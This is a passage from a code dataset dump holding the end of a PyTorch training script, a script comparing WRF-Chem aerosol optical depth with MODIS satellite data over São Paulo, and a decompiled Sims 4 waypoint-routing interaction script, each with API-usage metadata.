map_location=device)\n\nsample = train_dataset[1]\ntrainloader = CustomDataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=4)\nvalloader = CustomDataLoader(val_dataset, batch_size=batch_size, shuffle=True, num_workers=0)\n\nnet = Net(sample['x'].shape[0], 12, n_layers=n_layers, n_units=n_units)\nnet.to(device)\nloss_fn = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=lr, momentum=momentum)\n\nprint_every = int(len(train_dataset)/(10 * batch_size))\ntrain = TrainLoop(net, trainloader, optimizer, loss_fn, device, writer, val_loader=valloader, print_every=print_every)\ntrain.fit(max_epochs)\n", "sub_path": "experiments/experiment4.py", "file_name": "experiment4.py", "file_ext": "py", "file_size_in_byte": 2237, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "torch.cuda.is_available", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 24, "usage_type": "call"}, {"api_name": "src.utils.file_io.get_activity_names", "line_number": 26, "usage_type": "call"}, {"api_name": "src.utils.file_io.get_user_splits", "line_number": 27, "usage_type": 
"call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 32, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 33, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 38, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 45, "usage_type": "call"}, {"api_name": "src.dataloader.torch_dataloader.CustomDataLoader", "line_number": 46, "usage_type": "call"}, {"api_name": "src.models.ffnn.Net", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 51, "usage_type": "name"}, {"api_name": "src.train.trainloop.TrainLoop", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "211881992", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 14 14:28:00 2021\n\n@author: noelia\n\"\"\"\n\nimport glob\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nfrom matplotlib.colors import BoundaryNorm\nimport matplotlib.cm as cm\nfrom matplotlib.ticker import MaxNLocator\nimport xarray as xr\nimport pandas as pd\nimport basemap_modis as basemod\n\ndire_mod = \"../DATA/SP/regridded_2017/\"\ndire_wrf = '../DATA/'\n\noutput = \"../results/plot_wrf_modis/\"\n########################### READ WRF IMAGES ###############################\nds_disk = xr.open_dataset(dire_wrf+\"june_aod.avg.column.550_p1.nc\")\naod_wrf = ds_disk[\"aod_055\"].values\nlon = ds_disk.XLONG.values\nlat = ds_disk.XLAT.values\ntimes = pd.DataFrame({'date': ds_disk.Time.values})\ntimes['date_local'] = times['date'].dt.tz_localize('UTC').dt.tz_convert('America/Sao_Paulo')\ntimes['date_qualar'] = times['date_local'].dt.strftime('%Y-%m-%d %H:%M:%S')\ntime_wrf = []\nfor ll in str(times['date_qualar'].tolist()).split(\",\"):\n time_wrf.append(ll[2:15])\n\nserie_time = pd.DataFrame(pd.date_range(start='2017-06-01', end='2017-06-16'), columns=[\"Date\"]) \nserie_time[\"Date\"] = serie_time[\"Date\"].dt.strftime('%Y-%m-%d') \n################### eliminando los dias repetidos ###############################\nmj3 = []\nmj2 = [] ### almacenando solo los datos aod de los dias no repetidos\nfor i in range(len(time_wrf)):\n if i == (len(time_wrf)-1):\n break;\n else:\n if time_wrf[i] == time_wrf[i+1]:\n pass;\n else:\n mj3.append(time_wrf[i]) \n mj2.append(aod_wrf[i])\n if i == (len(time_wrf)-2):\n if time_wrf[i] == time_wrf[i+1]:\n mj3.append(time_wrf[len(time_wrf)-1])\n mj2.append(aod_wrf[len(time_wrf)-1])\n else:\n pass;\n########################### READ MODIS IMAGES #############################\nmylist=[]\nlistdirr = []\nfiles1 = sorted(glob.glob(dire_mod+\"*_regrid.nc\")) ## archivos wrfout\nfor i in range(len(files1)):\n if i == (len(files1)-1):\n break; \n else:\n if files1[i][-50:-33] == files1[i+1][-50:-33]: #### para la misma hora\n listdirr.append(files1[i]) \n if i == (len(files1)-2):\n listdirr.append(files1[len(files1)-1])\n mylist.append(listdirr) \n else:\n listdirr.append(files1[i])\n mylist.append(listdirr)\n listdirr = 
[]\n\n##### Build a mosaic of the MODIS data for the same hour\naod_mod_total = np.zeros((len(mylist),aod_wrf.shape[1],aod_wrf.shape[2])) \ntime_mod_total = []\nfor n in range(len(mylist)):\n    if len(mylist[n]) != 1: #### when there is more than one granule for the same hour\n        m=[]\n        for FILE_NAME in mylist[n]:\n            df = xr.open_dataarray(FILE_NAME)\n            times_mod = df.attrs[\"time\"] \n            aod_mod = df.values\n            m.append(aod_mod)\n        aod_mod_total[n] = np.nansum(np.dstack(m),2) ### mosaic \n        time_mod_total.append(times_mod)\n    else:\n        for FILE_NAME in mylist[n]:\n            df = xr.open_dataarray(FILE_NAME)\n            times_mod = df.attrs[\"time\"] \n            aod_mod_total[n] = df.values\n            time_mod_total.append(times_mod)\n    \n######## comparing model times with satellite image times ###########\naod_mod_total[aod_mod_total==0]=np.nan\nlist_aod_mod = []; list_aod_wrf = []; time_wrf_total = []\nfor i in range(len(time_mod_total)):\n    for j in range(len(mj3)):\n        if str(time_mod_total[i][0:13]) == str(mj3[j]): ##### time selection\n            time_wrf_total.append(mj3[j])\n            for a in range(lon.shape[0]):\n                for b in range(lat.shape[1]):\n                    if str(aod_mod_total[i,a,b]) == str(np.nan):\n                        mj2[j][a,b] = np.nan\n            list_aod_mod.append(aod_mod_total[i])\n            list_aod_wrf.append(mj2[j])\n            \n########################### TERRA AND AQUA ###################################### \ndat_wrf_t_day = [];dat_wrf_a_day = [];dat_mod_t_day = [];dat_mod_a_day = []\nfor n in range(len(serie_time)):\n    day_wrf_t = [];day_wrf_a = [];day_mod_t = [];day_mod_a = [] \n    for o in range(len(time_mod_total)):\n        ######################## daily mean ################################\n        if str(serie_time[\"Date\"][n]) == str(time_mod_total[o][0:10]):\n            if int(time_mod_total[o][11:13]) < 12: #### Terra\n                day_mod_t.append(list_aod_mod[o])\n                day_wrf_t.append(list_aod_wrf[o])\n            else:\n                day_mod_a.append(list_aod_mod[o]) #### Aqua\n                day_wrf_a.append(list_aod_wrf[o])\n    if len(day_mod_t) != 0:\n        dat_mod_t_day.append(np.nanmean(day_mod_t,axis=0))\n        dat_wrf_t_day.append(np.nanmean(day_wrf_t,axis=0))\n    else:\n        dat_mod_t_day.append(np.nan)\n        dat_wrf_t_day.append(np.nan)\n    if len(day_mod_a) != 0:\n        dat_mod_a_day.append(np.nanmean(day_mod_a,axis=0))\n        dat_wrf_a_day.append(np.nanmean(day_wrf_a,axis=0))\n    else:\n        dat_mod_a_day.append(np.nan)\n        dat_wrf_a_day.append(np.nan)\n    ################# day ###############################\n    ############### TERRA ######################################\n    if type(dat_mod_t_day[n]) == np.ndarray:\n        basemod.plot_map_day(output,dat_mod_t_day[n],dat_wrf_t_day[n],lat,lon,serie_time[\"Date\"][n],\"Terra\")\n    ############### AQUA ######################################\n    if type(dat_mod_a_day[n]) == np.ndarray: \n        basemod.plot_map_day(output,dat_mod_a_day[n],dat_wrf_a_day[n],lat,lon,serie_time[\"Date\"][n],\"Aqua\")\n\n\n################ selecting by area ################################\narea = list_aod_mod[0].shape[0]*list_aod_mod[0].shape[1]\nporcentaje = [80,70,50,30,20,10] #### percentages of non-NaN values\nfor i in range(len(porcentaje)):\n    por = porcentaje[i]*(area)/100 ### acceptable number of NaN values\n    dat_mt = []; dat_wt = []; dat_ma = []; dat_wa = []\n    dat_wrf_t_day = [];dat_wrf_a_day = [];dat_mod_t_day = [];dat_mod_a_day = []\n    for n in range(len(serie_time)):\n        day_wrf_t = [];day_wrf_a = [];day_mod_t = [];day_mod_a = [] \n        for o in range(len(time_mod_total)):\n            ######################## daily mean ################################\n            if str(serie_time[\"Date\"][n]) == str(time_mod_total[o][0:10]):\n                if int(time_mod_total[o][11:13]) < 12: #### 
Terra\n                day_mod_t.append(list_aod_mod[o])\n                day_wrf_t.append(list_aod_wrf[o])\n            else:\n                day_mod_a.append(list_aod_mod[o]) #### Aqua\n                day_wrf_a.append(list_aod_wrf[o])\n        if len(day_mod_t) != 0:\n            dat_mod_t_day.append(np.nanmean(day_mod_t,axis=0))\n            dat_wrf_t_day.append(np.nanmean(day_wrf_t,axis=0))\n        else:\n            dat_mod_t_day.append(np.nan)\n            dat_wrf_t_day.append(np.nan)\n        if len(day_mod_a) != 0:\n            dat_mod_a_day.append(np.nanmean(day_mod_a,axis=0))\n            dat_wrf_a_day.append(np.nanmean(day_wrf_a,axis=0))\n        else:\n            dat_mod_a_day.append(np.nan)\n            dat_wrf_a_day.append(np.nan)\n\n        if type(dat_mod_t_day[n]) == np.ndarray:\n            if (area - np.isnan(dat_mod_t_day[n]).sum() >= int(por)):\n                dat_mt.append(dat_mod_t_day[n])\n                dat_wt.append(dat_wrf_t_day[n])\n        if type(dat_mod_a_day[n]) == np.ndarray: \n            if (area - np.isnan(dat_mod_a_day[n]).sum() >= int(por)):\n                dat_ma.append(dat_mod_a_day[n])\n                dat_wa.append(dat_wrf_a_day[n])\n\n    if (len(dat_mt) != 0 and len(dat_wt) != 0): \n        ############### TERRA ######################################\n        dat_mod_t = np.nanmean(dat_mt,axis=0)\n        dat_wrf_t = np.nanmean(dat_wt,axis=0)\n        basemod.plot_map_month(output,dat_mod_t,dat_wrf_t,lat,lon,\"Terra\",porcentaje[i],len(dat_mt))\n    if (len(dat_ma) != 0 and len(dat_wa) != 0): \n        ############### AQUA ######################################\n        dat_mod_a = np.nanmean(dat_ma,axis=0)\n        dat_wrf_a = np.nanmean(dat_wa,axis=0)\n        basemod.plot_map_month(output,dat_mod_a,dat_wrf_a,lat,lon,\"Aqua\",porcentaje[i],len(dat_ma))\n\n\n######################## mean over the period ################################\nfor n in range(len(dat_mod_t_day)): \n    if type(dat_mod_t_day[n]) != np.ndarray:\n        del dat_mod_t_day[n]\n        del dat_wrf_t_day[n]\nfor n in range(len(dat_mod_a_day)): \n    if type(dat_mod_a_day[n]) != np.ndarray:\n        del dat_mod_a_day[n]\n        del dat_wrf_a_day[n]\ndat_mod_t = np.nanmean(dat_mod_t_day,axis=0)\ndat_wrf_t = np.nanmean(dat_wrf_t_day,axis=0)\nbasemod.plot_map_month(output,dat_mod_t,dat_wrf_t,lat,lon,\"Terra\",\"100\",len(dat_mod_t_day))\n\ndat_mod_a = np.nanmean(dat_mod_a_day,axis=0)\ndat_wrf_a = np.nanmean(dat_wrf_a_day,axis=0)\nbasemod.plot_map_month(output,dat_mod_a,dat_wrf_a,lat,lon,\"Aqua\",\"100\",len(dat_mod_a_day))\n\n\ndiff_t = dat_mod_t - dat_wrf_t\ndiff_a = dat_mod_a - dat_wrf_a\n\nlevels = MaxNLocator(nbins=10).tick_values(0,0.5)\ncmap = cm.get_cmap(\"Blues\",lut=25)\ncmap.set_bad(\"w\")\nnorm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\n\nfig = plt.figure(figsize=(11, 11))\nrect = fig.patch\nrect.set_facecolor('lightgoldenrodyellow')\nax0 = fig.add_subplot(111, frame_on=False)\nax0.set_xticks([])\nax0.set_yticks([])\nax = fig.add_subplot(111)\nfor axis in ['top','bottom','left','right']:\n    ax.spines[axis].set_linewidth(3.0)\nm = Basemap(projection='cyl', resolution='h', llcrnrlat=-25.2, urcrnrlat=-21.5,\n            llcrnrlon=-49.0, urcrnrlon=-44.3)\nm.drawcoastlines(linewidth=1.5)\nm.drawstates(linewidth=1.5) \nm.drawparallels(np.arange(-90., 120., 1), labels=[1, 0, 0, 0],fontsize=18)\nm.drawmeridians(np.arange(-180., 181., 1), labels=[0, 0, 0, 1],fontsize=18) \ntrend=m.pcolormesh(lon, lat, diff_t, cmap=cmap, norm = norm)\ncbar = m.colorbar(trend, location='right', pad=\"5%\", ticks=levels)\ncbar.set_label('None', fontsize=19)\nax.set_title(\"Difference between Terra Satellite and Model Data\" +\"\\n\" +\n             \"over SPMR for June\", fontsize=20)\n\nfig = plt.figure(figsize=(11, 11))\nrect = 
fig.patch\nrect.set_facecolor('lightgoldenrodyellow')\nax0 = fig.add_subplot(111, frame_on=False)\nax0.set_xticks([])\nax0.set_yticks([])\nax = fig.add_subplot(111)\nfor axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(3.0)\nm = Basemap(projection='cyl', resolution='h', llcrnrlat=-25.2, urcrnrlat=-21.5,\n llcrnrlon=-49.0, urcrnrlon=-44.3)\nm.drawcoastlines(linewidth=1.5)\nm.drawstates(linewidth=1.5) \nm.drawparallels(np.arange(-90., 120., 1), labels=[1, 0, 0, 0],fontsize=18)\nm.drawmeridians(np.arange(-180., 181., 1), labels=[0, 0, 0, 1],fontsize=18) \ntrend=m.pcolormesh(lon, lat, diff_a, cmap=cmap, norm = norm)\ncbar = m.colorbar(trend, location='right', pad=\"5%\", ticks=levels)\ncbar.set_label('None', fontsize=19)\nax.set_title(\"Difference between Aqua Satellite and Model Data\" +\"\\n\" +\n \"over SPMR for June\", fontsize=20)\nplt.show()\n\n\n", "sub_path": "MODIS/AOD/WRF-Chem_Modis/3.TandA_wrf_compared.py", "file_name": "3.TandA_wrf_compared.py", "file_ext": "py", "file_size_in_byte": 11238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "xarray.open_dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.date_range", "line_number": 36, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "xarray.open_dataarray", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 85, "usage_type": "call"}, {"api_name": "xarray.open_dataarray", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 135, "usage_type": "attribute"}, {"api_name": "basemap_modis.plot_map_day", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 138, "usage_type": "attribute"}, {"api_name": "basemap_modis.plot_map_day", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 170, "usage_type": "attribute"}, 
{"api_name": "numpy.nan", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 187, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 192, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 206, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 210, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.cm.get_cmap", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.colors.BoundaryNorm", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}]} +{"seq_id": "516536872", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\interactions\\jog_interaction.py\n# Compiled at: 2020-07-22 05:56:20\n# Size of source mod 2**32: 16676 bytes\nfrom _math import Vector3\nimport itertools, random\nfrom balloon.tunable_balloon import TunableBalloon\nfrom element_utils import do_all\nfrom event_testing.results import TestResult\nfrom interactions import TargetType\nfrom interactions.base.super_interaction import SuperInteraction\nfrom 
interactions.constraints import Circle, ANYWHERE\nfrom interactions.utils.routing import FollowPath, PlanRoute, get_route_element_for_path\nfrom routing.walkstyle.walkstyle_request import WalkStyleRequest\nfrom routing.waypoints.waypoint_generator_variant import TunableWaypointGeneratorVariant\nfrom routing.waypoints.waypoint_stitching import WaypointStitchingVariant\nfrom sims4 import random\nfrom sims4.tuning.tunable import TunableRange, Tunable, OptionalTunable\nfrom sims4.tuning.tunable_base import GroupNames\nfrom sims4.utils import flexmethod\nimport element_utils, routing, sims4.log\nlogger = sims4.log.Logger('WaypointInteraction')\n\nclass _WaypointGeneratorRallyable:\n\n def __init__(self, waypoint_info):\n self._original_generator = waypoint_info\n\n def get_start_constraint(self):\n return self._original_generator.get_start_constraint()\n\n def get_waypoint_constraints_gen(self, routing_agent, waypoint_count):\n yield from self._original_generator.get_waypoint_constraints_gen(routing_agent, waypoint_count)\n if False:\n yield None\n\n\nclass WaypointInteraction(SuperInteraction):\n INSTANCE_TUNABLES = {'waypoint_constraint':TunableWaypointGeneratorVariant(tuning_group=GroupNames.ROUTING), \n 'waypoint_count':TunableRange(description='\\n The number of waypoints to select, from spawn points in the zone, to\\n visit for a Jog prior to returning to the original location.\\n ',\n tunable_type=int,\n default=2,\n minimum=2,\n tuning_group=GroupNames.ROUTING), \n 'waypoint_walk_style':WalkStyleRequest.TunableFactory(description='\\n The walkstyle to use when routing between waypoints.\\n ',\n tuning_group=GroupNames.ROUTING), \n 'waypoint_stitching':WaypointStitchingVariant(tuning_group=GroupNames.ROUTING), \n 'waypoint_randomize_orientation':Tunable(description='\\n Make Waypoint orientation random. Default is velocity aligned.\\n ',\n tunable_type=bool,\n default=False,\n tuning_group=GroupNames.ROUTING), \n 'waypoint_clear_locomotion_mask':Tunable(description='\\n If enabled, override the locomotion queue mask. This mask controls\\n which Animation Requests and XEvents get blocked during locomotion.\\n By default, the mask blocks everything. If cleared, it blocks\\n nothing. It also lowers the animation track used by locomotion to \\n 9,999 from the default of 10,000. Use with care, ask your GPE.\\n ',\n tunable_type=bool,\n default=False,\n tuning_group=GroupNames.ROUTING), \n 'waypoint_override_agent_radius':OptionalTunable(description='\\n If enabled, use the specified value as the agent radius when\\n generating goals for the waypoints. The agent radius is restored\\n for the actual route.\\n ',\n tunable=TunableRange(description='\\n The value to use as the agent radius when generating goals. \\n ',\n tunable_type=float,\n minimum=0,\n maximum=1.0,\n default=0.123),\n tuning_group=GroupNames.ROUTING), \n 'waypoint_route_fail_balloon':OptionalTunable(description='\\n Tuning for balloon to show when failing to plan a aroute for this waypoint interaction. 
\\n ',\n tunable=TunableBalloon(locked_args={'balloon_delay':0, \n 'balloon_delay_random_offset':0, \n 'balloon_chance':100}),\n tuning_group=GroupNames.ROUTING)}\n\n def __init__(self, aop, *args, waypoint_generator=None, **kwargs):\n (super().__init__)(aop, *args, **kwargs)\n waypoint_info = kwargs.get('waypoint_info')\n if waypoint_info is not None:\n self._waypoint_generator = _WaypointGeneratorRallyable(waypoint_info)\n else:\n if aop.target is None:\n if self.target_type is TargetType.ACTOR:\n target = self.sim\n else:\n target = aop.target\n elif waypoint_generator is None:\n self._waypoint_generator = self.waypoint_constraint(self.context, target)\n else:\n self._waypoint_generator = waypoint_generator\n self._routing_infos = None\n self._goal_size = 0.0\n self.register_on_finishing_callback(self._clean_up_waypoint_generator)\n\n @classmethod\n def _test(cls, target, context, **interaction_parameters):\n sim = context.sim\n routing_master = sim.routing_master\n if routing_master is not None:\n if sim.parent is not routing_master:\n return TestResult(False, '{} cannot run Waypoint interactions because they are following {}', sim, routing_master)\n return (super()._test)(target, context, **interaction_parameters)\n\n def _get_starting_constraint(self, *args, **kwargs):\n constraint = ANYWHERE\n target = self.target\n if self._waypoint_generator.is_for_vehicle and target is not None and target.vehicle_component is not None:\n constraint = target.is_in_inventory() or Circle((target.position), (target.vehicle_component.minimum_route_distance), routing_surface=(target.routing_surface))\n constraint = constraint.intersect(self._waypoint_generator.get_water_constraint())\n else:\n constraint = self._waypoint_generator.get_start_constraint()\n posture_constraint = self._waypoint_generator.get_posture_constraint()\n if posture_constraint is not None:\n constraint = constraint.intersect(posture_constraint)\n return constraint\n\n @flexmethod\n def _constraint_gen(cls, inst, *args, **kwargs):\n inst_or_cls = inst if inst is not None else cls\n if inst is not None:\n constraint = (inst._get_starting_constraint)(*args, **kwargs)\n yield constraint\n yield from (super(__class__, inst_or_cls)._constraint_gen)(*args, **kwargs)\n\n def cancel(self, *args, **kwargs):\n for sim_primitive in list(self.sim.primitives):\n if isinstance(sim_primitive, FollowPath):\n sim_primitive.detach()\n\n return (super().cancel)(*args, **kwargs)\n\n def _clean_up_waypoint_generator(self, _):\n self._waypoint_generator.clean_up()\n\n def _get_goals_for_constraint(self, constraint, routing_agent):\n goals = []\n handles = constraint.get_connectivity_handles(routing_agent)\n for handle in handles:\n goals.extend(handle.get_goals(always_reject_invalid_goals=True))\n\n return goals\n\n def _show_route_fail_balloon(self):\n balloon_tuning = self.waypoint_route_fail_balloon\n if balloon_tuning is None:\n return\n else:\n return self.is_user_directed or None\n balloon_requests = balloon_tuning(self)\n if balloon_requests:\n chosen_balloon = random.random.choice(balloon_requests)\n if chosen_balloon is not None:\n chosen_balloon.distribute()\n\n def _run_interaction_gen(self, timeline):\n all_sims = self.required_sims()\n if not all_sims:\n return\n self._routing_infos = []\n routing_agent = self.sim\n for sim in all_sims:\n routing_context = sim.routing_context\n routing_agent = sim\n vehicle = None if not sim.posture.is_vehicle else sim.parent\n if vehicle is not None:\n if vehicle.vehicle_component is not None:\n 
routing_agent = vehicle\n routing_context = vehicle.routing_component.pathplan_context\n self._routing_infos.append((routing_agent, routing_context))\n\n waypoints = []\n default_agent_radius = None\n if self.waypoint_override_agent_radius is not None:\n if routing_agent.routing_component is not None:\n default_agent_radius = routing_agent.routing_component._pathplan_context.agent_radius\n routing_agent.routing_component._pathplan_context.agent_radius = self.waypoint_override_agent_radius\n else:\n try:\n for constraint in self._waypoint_generator.get_waypoint_constraints_gen(routing_agent, self.waypoint_count):\n goals = self._get_goals_for_constraint(constraint, routing_agent)\n if not goals:\n continue\n if self.waypoint_randomize_orientation:\n for goal in goals:\n goal.orientation = sims4.math.angle_to_yaw_quaternion(random.uniform(0.0, sims4.math.TWO_PI))\n\n waypoints.append(goals)\n\n finally:\n if default_agent_radius is not None:\n routing_agent.routing_component._pathplan_context.agent_radius = default_agent_radius\n\n return waypoints or False\n self._goal_size = max((info[0].routing_component.get_routing_context().agent_goal_radius for info in self._routing_infos))\n self._goal_size *= self._goal_size\n if self.staging:\n for route_waypoints in itertools.cycle(self.waypoint_stitching(waypoints, self._waypoint_generator.loops)):\n result = yield from self._do_route_to_constraint_gen(route_waypoints, timeline)\n if not result:\n return result\n\n else:\n for route_waypoints in self.waypoint_stitching(waypoints, self._waypoint_generator.loops):\n result = yield from self._do_route_to_constraint_gen(route_waypoints, timeline)\n\n return result\n return True\n if False:\n yield None\n\n def _do_route_to_constraint_gen(self, waypoints, timeline):\n if self.is_finishing:\n return False\n plan_primitives = []\n for i, routing_info in enumerate(self._routing_infos):\n routing_agent = routing_info[0]\n routing_context = routing_info[1]\n route = routing.Route((routing_agent.routing_location), (waypoints[(-1)]), waypoints=(waypoints[:-1]), routing_context=routing_context)\n plan_primitive = PlanRoute(route, routing_agent, interaction=self)\n result = yield from element_utils.run_child(timeline, plan_primitive)\n if not result:\n self._show_route_fail_balloon()\n return False\n plan_primitive.path.nodes and plan_primitive.path.nodes.plan_success or self._show_route_fail_balloon()\n return False\n plan_primitive.path.blended_orientation = self.waypoint_randomize_orientation\n plan_primitives.append(plan_primitive)\n if i == len(self._routing_infos) - 1:\n continue\n for node in plan_primitive.path.nodes:\n position = Vector3(*node.position)\n for goal in itertools.chain.from_iterable(waypoints):\n if goal.routing_surface_id != node.routing_surface_id:\n continue\n dist_sq = (Vector3(*goal.position) - position).magnitude_2d_squared()\n if dist_sq < self._goal_size:\n goal.cost = routing.get_default_obstacle_cost()\n\n route_primitives = []\n track_override = None\n mask_override = None\n if self.waypoint_clear_locomotion_mask:\n mask_override = 0\n track_override = 9999\n for plan_primitive in plan_primitives:\n sequence = get_route_element_for_path((plan_primitive.sim), (plan_primitive.path), interaction=self,\n force_follow_path=True,\n track_override=track_override,\n mask_override=mask_override)\n walkstyle_request = self.waypoint_walk_style(plan_primitive.sim)\n sequence = walkstyle_request(sequence=sequence)\n route_primitives.append(sequence)\n\n result = yield from 
element_utils.run_child(timeline, do_all(*route_primitives))\n return result\n if False:\n yield None\n\n @classmethod\n def get_rallyable_aops_gen(cls, target, context, **kwargs):\n key = 'waypoint_info'\n if key not in kwargs:\n waypoint_generator = cls.waypoint_constraint(context, target)\n kwargs[key] = waypoint_generator\n yield from (super().get_rallyable_aops_gen)(target, context, rally_constraint=waypoint_generator.get_start_constraint(), **kwargs)\n if False:\n yield None", "sub_path": "Scripts/simulation/interactions/jog_interaction.py", "file_name": "jog_interaction.py", "file_ext": "py", "file_size_in_byte": 13299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sims4.log.Logger", "line_number": 24, "usage_type": "call"}, {"api_name": "sims4.log", "line_number": 24, "usage_type": "attribute"}, {"api_name": "interactions.base.super_interaction.SuperInteraction", "line_number": 40, "usage_type": "name"}, {"api_name": "routing.waypoints.waypoint_generator_variant.TunableWaypointGeneratorVariant", "line_number": 41, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 41, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.TunableRange", "line_number": 42, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 46, "usage_type": "name"}, {"api_name": "routing.walkstyle.walkstyle_request.WalkStyleRequest.TunableFactory", "line_number": 47, "usage_type": "call"}, 